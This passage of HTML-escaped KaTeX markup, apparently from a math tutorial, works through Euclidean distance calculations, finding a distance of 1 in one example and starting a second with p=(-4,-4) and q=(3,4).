vlist-t2&quot;&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.30110799999999993em;&quot;&gt;&lt;span style=&quot;top:-2.5500000000000003em;margin-left:-0.03588em;margin-right:0.05em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:2.7em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;sizing reset-size6 size3 mtight&quot;&gt;&lt;span class=&quot;mord mtight&quot;&gt;1&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;vlist-s&quot;&gt;​&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.15em;&quot;&gt;&lt;span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2222222222222222em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mbin&quot;&gt;−&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2222222222222222em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;&lt;span class=&quot;mord mathnormal&quot;&gt;p&lt;/span&gt;&lt;span class=&quot;msupsub&quot;&gt;&lt;span class=&quot;vlist-t vlist-t2&quot;&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.30110799999999993em;&quot;&gt;&lt;span style=&quot;top:-2.5500000000000003em;margin-left:0em;margin-right:0.05em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:2.7em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;sizing reset-size6 size3 mtight&quot;&gt;&lt;span class=&quot;mord mtight&quot;&gt;1&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;vlist-s&quot;&gt;​&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.15em;&quot;&gt;&lt;span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;mclose&quot;&gt;&lt;span class=&quot;mclose&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;msupsub&quot;&gt;&lt;span class=&quot;vlist-t&quot;&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.8641079999999999em;&quot;&gt;&lt;span style=&quot;top:-3.113em;margin-right:0.05em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:2.7em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;sizing reset-size6 size3 mtight&quot;&gt;&lt;span class=&quot;mord mtight&quot;&gt;2&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2777777777777778em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mrel&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2777777777777778em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mopen&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;4&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2222222222222222em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mbin&quot;&gt;−&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2222222222222222em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;3&lt;/span&gt;&lt;span class=&quot;mclose&quot;&gt;&lt;span class=&quot;mclose&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;msupsub&quot;&gt;&lt;span class=&quot;vlist-t&quot;&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.8641079999999999em;&quot;&gt;&lt;span style=&quot;top:-3.113em;margin-right:0.05em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:2.7em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;sizing reset-size6 size3 mtight&quot;&gt;&lt;span class=&quot;mord mtight&quot;&gt;2&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2777777777777778em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mrel&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2777777777777778em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;&lt;span class=&quot;mord&quot;&gt;1&lt;/span&gt;&lt;span class=&quot;msupsub&quot;&gt;&lt;span class=&quot;vlist-t&quot;&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.8641079999999999em;&quot;&gt;&lt;span style=&quot;top:-3.113em;margin-right:0.05em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:2.7em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;sizing reset-size6 size3 mtight&quot;&gt;&lt;span class=&quot;mord mtight&quot;&gt;2&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;top:-2.385892em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:3em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;&lt;span class=&quot;mopen&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;&lt;span class=&quot;mord mathnormal&quot; style=&quot;margin-right:0.03588em;&quot;&gt;q&lt;/span&gt;&lt;span class=&quot;msupsub&quot;&gt;&lt;span class=&quot;vlist-t vlist-t2&quot;&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.30110799999999993em;&quot;&gt;&lt;span style=&quot;top:-2.5500000000000003em;margin-left:-0.03588em;margin-right:0.05em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:2.7em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;sizing reset-size6 size3 mtight&quot;&gt;&lt;span class=&quot;mord mtight&quot;&gt;2&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;vlist-s&quot;&gt;​&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.15em;&quot;&gt;&lt;span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2222222222222222em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mbin&quot;&gt;−&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2222222222222222em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;&lt;span class=&quot;mord mathnormal&quot;&gt;p&lt;/span&gt;&lt;span class=&quot;msupsub&quot;&gt;&lt;span class=&quot;vlist-t vlist-t2&quot;&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.30110799999999993em;&quot;&gt;&lt;span style=&quot;top:-2.5500000000000003em;margin-left:0em;margin-right:0.05em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:2.7em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;sizing reset-size6 size3 mtight&quot;&gt;&lt;span class=&quot;mord mtight&quot;&gt;2&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;vlist-s&quot;&gt;​&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.15em;&quot;&gt;&lt;span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;mclose&quot;&gt;&lt;span class=&quot;mclose&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;msupsub&quot;&gt;&lt;span class=&quot;vlist-t&quot;&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.8641079999999999em;&quot;&gt;&lt;span style=&quot;top:-3.113em;margin-right:0.05em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:2.7em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;sizing reset-size6 size3 mtight&quot;&gt;&lt;span class=&quot;mord mtight&quot;&gt;2&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2777777777777778em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mrel&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2777777777777778em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mopen&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;4&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2222222222222222em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mbin&quot;&gt;−&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2222222222222222em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;4&lt;/span&gt;&lt;span class=&quot;mclose&quot;&gt;&lt;span class=&quot;mclose&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;msupsub&quot;&gt;&lt;span class=&quot;vlist-t&quot;&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.8641079999999999em;&quot;&gt;&lt;span style=&quot;top:-3.113em;margin-right:0.05em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:2.7em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;sizing reset-size6 size3 mtight&quot;&gt;&lt;span class=&quot;mord mtight&quot;&gt;2&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2777777777777778em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mrel&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2777777777777778em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;&lt;span class=&quot;mord&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;msupsub&quot;&gt;&lt;span class=&quot;vlist-t&quot;&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.8641079999999999em;&quot;&gt;&lt;span style=&quot;top:-3.113em;margin-right:0.05em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:2.7em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;sizing reset-size6 size3 mtight&quot;&gt;&lt;span class=&quot;mord mtight&quot;&gt;2&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;vlist-s&quot;&gt;​&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:1.274108em;&quot;&gt;&lt;span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;col-align-l&quot;&gt;&lt;span class=&quot;vlist-t vlist-t2&quot;&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:1.774108em;&quot;&gt;&lt;span style=&quot;top:-3.91em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:3em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;&lt;span class=&quot;mord&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2777777777777778em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mrel&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2777777777777778em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;1&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;top:-2.385892em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:3em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;&lt;span class=&quot;mord&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2777777777777778em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mrel&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2777777777777778em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;0&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;vlist-s&quot;&gt;​&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:1.274108em;&quot;&gt;&lt;span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;And then take the square root of the sum of the differences to get the value of &lt;span class=&quot;katex&quot;&gt;&lt;span class=&quot;katex-mathml&quot;&gt;&lt;math xmlns=&quot;http://www.w3.org/1998/Math/MathML&quot;&gt;&lt;semantics&gt;&lt;mrow&gt;&lt;mi&gt;d&lt;/mi&gt;&lt;/mrow&gt;&lt;annotation encoding=&quot;application/x-tex&quot;&gt;d&lt;/annotation&gt;&lt;/semantics&gt;&lt;/math&gt;&lt;/span&gt;&lt;span class=&quot;katex-html&quot; aria-hidden=&quot;true&quot;&gt;&lt;span class=&quot;base&quot;&gt;&lt;span class=&quot;strut&quot; style=&quot;height:0.69444em;vertical-align:0em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord mathnormal&quot;&gt;d&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;:&lt;/p&gt;
&lt;p class=&quot;katex-block&quot;&gt;&lt;span class=&quot;katex-display&quot;&gt;&lt;span class=&quot;katex&quot;&gt;&lt;span class=&quot;katex-mathml&quot;&gt;&lt;math xmlns=&quot;http://www.w3.org/1998/Math/MathML&quot; display=&quot;block&quot;&gt;&lt;semantics&gt;&lt;mrow&gt;&lt;mi&gt;d&lt;/mi&gt;&lt;mo&gt;=&lt;/mo&gt;&lt;msqrt&gt;&lt;mrow&gt;&lt;mn&gt;1&lt;/mn&gt;&lt;mo&gt;+&lt;/mo&gt;&lt;mn&gt;0&lt;/mn&gt;&lt;/mrow&gt;&lt;/msqrt&gt;&lt;mo&gt;=&lt;/mo&gt;&lt;mn&gt;1&lt;/mn&gt;&lt;/mrow&gt;&lt;annotation encoding=&quot;application/x-tex&quot;&gt;d = &#92;sqrt{1+0} = 1
&lt;/annotation&gt;&lt;/semantics&gt;&lt;/math&gt;&lt;/span&gt;&lt;span class=&quot;katex-html&quot; aria-hidden=&quot;true&quot;&gt;&lt;span class=&quot;base&quot;&gt;&lt;span class=&quot;strut&quot; style=&quot;height:0.69444em;vertical-align:0em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord mathnormal&quot;&gt;d&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2777777777777778em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mrel&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2777777777777778em;&quot;&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;base&quot;&gt;&lt;span class=&quot;strut&quot; style=&quot;height:1.04em;vertical-align:-0.12556999999999996em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord sqrt&quot;&gt;&lt;span class=&quot;vlist-t vlist-t2&quot;&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.9144300000000001em;&quot;&gt;&lt;span class=&quot;svg-align&quot; style=&quot;top:-3em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:3em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot; style=&quot;padding-left:0.833em;&quot;&gt;&lt;span class=&quot;mord&quot;&gt;1&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2222222222222222em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mbin&quot;&gt;+&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2222222222222222em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;0&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;top:-2.8744300000000003em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:3em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;hide-tail&quot; style=&quot;min-width:0.853em;height:1.08em;&quot;&gt;&lt;svg width=&quot;400em&quot; height=&quot;1.08em&quot; viewBox=&quot;0 0 400000 1080&quot; preserveAspectRatio=&quot;xMinYMin slice&quot;&gt;&lt;path d=&quot;M95,702
c-2.7,0,-7.17,-2.7,-13.5,-8c-5.8,-5.3,-9.5,-10,-9.5,-14
c0,-2,0.3,-3.3,1,-4c1.3,-2.7,23.83,-20.7,67.5,-54
c44.2,-33.3,65.8,-50.3,66.5,-51c1.3,-1.3,3,-2,5,-2c4.7,0,8.7,3.3,12,10
s173,378,173,378c0.7,0,35.3,-71,104,-213c68.7,-142,137.5,-285,206.5,-429
c69,-144,104.5,-217.7,106.5,-221
l0 -0
c5.3,-9.3,12,-14,20,-14
H400000v40H845.2724
s-225.272,467,-225.272,467s-235,486,-235,486c-2.7,4.7,-9,7,-19,7
c-6,0,-10,-1,-12,-3s-194,-422,-194,-422s-65,47,-65,47z
M834 80h400000v40h-400000z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;vlist-s&quot;&gt;​&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.12556999999999996em;&quot;&gt;&lt;span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2777777777777778em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mrel&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2777777777777778em;&quot;&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;base&quot;&gt;&lt;span class=&quot;strut&quot; style=&quot;height:0.64444em;vertical-align:0em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;1&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;All that work for a &lt;span class=&quot;katex&quot;&gt;&lt;span class=&quot;katex-mathml&quot;&gt;&lt;math xmlns=&quot;http://www.w3.org/1998/Math/MathML&quot;&gt;&lt;semantics&gt;&lt;mrow&gt;&lt;mn&gt;1&lt;/mn&gt;&lt;/mrow&gt;&lt;annotation encoding=&quot;application/x-tex&quot;&gt;1&lt;/annotation&gt;&lt;/semantics&gt;&lt;/math&gt;&lt;/span&gt;&lt;span class=&quot;katex-html&quot; aria-hidden=&quot;true&quot;&gt;&lt;span class=&quot;base&quot;&gt;&lt;span class=&quot;strut&quot; style=&quot;height:0.64444em;vertical-align:0em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;1&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;! Alas. We can do the same but where &lt;span class=&quot;katex&quot;&gt;&lt;span class=&quot;katex-mathml&quot;&gt;&lt;math xmlns=&quot;http://www.w3.org/1998/Math/MathML&quot;&gt;&lt;semantics&gt;&lt;mrow&gt;&lt;mi&gt;p&lt;/mi&gt;&lt;mo&gt;=&lt;/mo&gt;&lt;mo stretchy=&quot;false&quot;&gt;(&lt;/mo&gt;&lt;mo&gt;−&lt;/mo&gt;&lt;mn&gt;4&lt;/mn&gt;&lt;mo separator=&quot;true&quot;&gt;,&lt;/mo&gt;&lt;mo&gt;−&lt;/mo&gt;&lt;mn&gt;4&lt;/mn&gt;&lt;mo stretchy=&quot;false&quot;&gt;)&lt;/mo&gt;&lt;/mrow&gt;&lt;annotation encoding=&quot;application/x-tex&quot;&gt;p=(-4,-4)&lt;/annotation&gt;&lt;/semantics&gt;&lt;/math&gt;&lt;/span&gt;&lt;span class=&quot;katex-html&quot; aria-hidden=&quot;true&quot;&gt;&lt;span class=&quot;base&quot;&gt;&lt;span class=&quot;strut&quot; style=&quot;height:0.625em;vertical-align:-0.19444em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord mathnormal&quot;&gt;p&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2777777777777778em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mrel&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2777777777777778em;&quot;&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;base&quot;&gt;&lt;span class=&quot;strut&quot; style=&quot;height:1em;vertical-align:-0.25em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mopen&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;−&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;4&lt;/span&gt;&lt;span class=&quot;mpunct&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.16666666666666666em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;−&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;4&lt;/span&gt;&lt;span class=&quot;mclose&quot;&gt;)&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt; and &lt;span class=&quot;katex&quot;&gt;&lt;span class=&quot;katex-mathml&quot;&gt;&lt;math xmlns=&quot;http://www.w3.org/1998/Math/MathML&quot;&gt;&lt;semantics&gt;&lt;mrow&gt;&lt;mi&gt;q&lt;/mi&gt;&lt;mo&gt;=&lt;/mo&gt;&lt;mo stretchy=&quot;false&quot;&gt;(&lt;/mo&gt;&lt;mn&gt;3&lt;/mn&gt;&lt;mo separator=&quot;true&quot;&gt;,&lt;/mo&gt;&lt;mn&gt;4&lt;/mn&gt;&lt;mo stretchy=&quot;false&quot;&gt;)&lt;/mo&gt;&lt;/mrow&gt;&lt;annotation encoding=&quot;application/x-tex&quot;&gt;q = (3,4)&lt;/annotation&gt;&lt;/semantics&gt;&lt;/math&gt;&lt;/span&gt;&lt;span class=&quot;katex-html&quot; aria-hidden=&quot;true&quot;&gt;&lt;span class=&quot;base&quot;&gt;&lt;span class=&quot;strut&quot; style=&quot;height:0.625em;vertical-align:-0.19444em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord mathnormal&quot; style=&quot;margin-right:0.03588em;&quot;&gt;q&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2777777777777778em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mrel&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2777777777777778em;&quot;&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;base&quot;&gt;&lt;span class=&quot;strut&quot; style=&quot;height:1em;vertical-align:-0.25em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mopen&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;3&lt;/span&gt;&lt;span class=&quot;mpunct&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.16666666666666666em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;4&lt;/span&gt;&lt;span class=&quot;mclose&quot;&gt;)&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;:&lt;/p&gt;
&lt;p class=&quot;katex-block&quot;&gt;&lt;span class=&quot;katex-display&quot;&gt;&lt;span class=&quot;katex&quot;&gt;&lt;span class=&quot;katex-mathml&quot;&gt;&lt;math xmlns=&quot;http://www.w3.org/1998/Math/MathML&quot; display=&quot;block&quot;&gt;&lt;semantics&gt;&lt;mtable rowspacing=&quot;0.24999999999999992em&quot; columnalign=&quot;right left&quot; columnspacing=&quot;0em&quot;&gt;&lt;mtr&gt;&lt;mtd&gt;&lt;mstyle scriptlevel=&quot;0&quot; displaystyle=&quot;true&quot;&gt;&lt;mrow&gt;&lt;msub&gt;&lt;mi&gt;q&lt;/mi&gt;&lt;mn&gt;1&lt;/mn&gt;&lt;/msub&gt;&lt;mo&gt;−&lt;/mo&gt;&lt;msub&gt;&lt;mi&gt;p&lt;/mi&gt;&lt;mn&gt;1&lt;/mn&gt;&lt;/msub&gt;&lt;mo&gt;=&lt;/mo&gt;&lt;mn&gt;3&lt;/mn&gt;&lt;mo&gt;−&lt;/mo&gt;&lt;mo stretchy=&quot;false&quot;&gt;(&lt;/mo&gt;&lt;mo&gt;−&lt;/mo&gt;&lt;mn&gt;4&lt;/mn&gt;&lt;mo stretchy=&quot;false&quot;&gt;)&lt;/mo&gt;&lt;/mrow&gt;&lt;/mstyle&gt;&lt;/mtd&gt;&lt;mtd&gt;&lt;mstyle scriptlevel=&quot;0&quot; displaystyle=&quot;true&quot;&gt;&lt;mrow&gt;&lt;mrow&gt;&lt;/mrow&gt;&lt;mo&gt;=&lt;/mo&gt;&lt;mn&gt;7&lt;/mn&gt;&lt;/mrow&gt;&lt;/mstyle&gt;&lt;/mtd&gt;&lt;/mtr&gt;&lt;mtr&gt;&lt;mtd&gt;&lt;mstyle scriptlevel=&quot;0&quot; displaystyle=&quot;true&quot;&gt;&lt;mrow&gt;&lt;msub&gt;&lt;mi&gt;q&lt;/mi&gt;&lt;mn&gt;2&lt;/mn&gt;&lt;/msub&gt;&lt;mo&gt;−&lt;/mo&gt;&lt;msub&gt;&lt;mi&gt;p&lt;/mi&gt;&lt;mn&gt;2&lt;/mn&gt;&lt;/msub&gt;&lt;mo&gt;=&lt;/mo&gt;&lt;mn&gt;4&lt;/mn&gt;&lt;mo&gt;−&lt;/mo&gt;&lt;mo stretchy=&quot;false&quot;&gt;(&lt;/mo&gt;&lt;mo&gt;−&lt;/mo&gt;&lt;mn&gt;4&lt;/mn&gt;&lt;mo stretchy=&quot;false&quot;&gt;)&lt;/mo&gt;&lt;/mrow&gt;&lt;/mstyle&gt;&lt;/mtd&gt;&lt;mtd&gt;&lt;mstyle scriptlevel=&quot;0&quot; displaystyle=&quot;true&quot;&gt;&lt;mrow&gt;&lt;mrow&gt;&lt;/mrow&gt;&lt;mo&gt;=&lt;/mo&gt;&lt;mn&gt;8&lt;/mn&gt;&lt;/mrow&gt;&lt;/mstyle&gt;&lt;/mtd&gt;&lt;/mtr&gt;&lt;mtr&gt;&lt;mtd&gt;&lt;mstyle scriptlevel=&quot;0&quot; displaystyle=&quot;true&quot;&gt;&lt;mrow&gt;&lt;mo stretchy=&quot;false&quot;&gt;(&lt;/mo&gt;&lt;msub&gt;&lt;mi&gt;q&lt;/mi&gt;&lt;mn&gt;1&lt;/mn&gt;&lt;/msub&gt;&lt;mo&gt;−&lt;/mo&gt;&lt;msub&gt;&lt;mi&gt;p&lt;/mi&gt;&lt;mn&gt;1&lt;/mn&gt;&lt;/msub&gt;&lt;msup&gt;&lt;mo stretchy=&quot;false&quot;&gt;)&lt;/mo&gt;&lt;mn&gt;2&lt;/mn&gt;&lt;/msup&gt;&lt;mo&gt;=&lt;/mo&gt;&lt;msup&gt;&lt;mn&gt;7&lt;/mn&gt;&lt;mn&gt;2&lt;/mn&gt;&lt;/msup&gt;&lt;/mrow&gt;&lt;/mstyle&gt;&lt;/mtd&gt;&lt;mtd&gt;&lt;mstyle scriptlevel=&quot;0&quot; displaystyle=&quot;true&quot;&gt;&lt;mrow&gt;&lt;mrow&gt;&lt;/mrow&gt;&lt;mo&gt;=&lt;/mo&gt;&lt;mn&gt;49&lt;/mn&gt;&lt;/mrow&gt;&lt;/mstyle&gt;&lt;/mtd&gt;&lt;/mtr&gt;&lt;mtr&gt;&lt;mtd&gt;&lt;mstyle 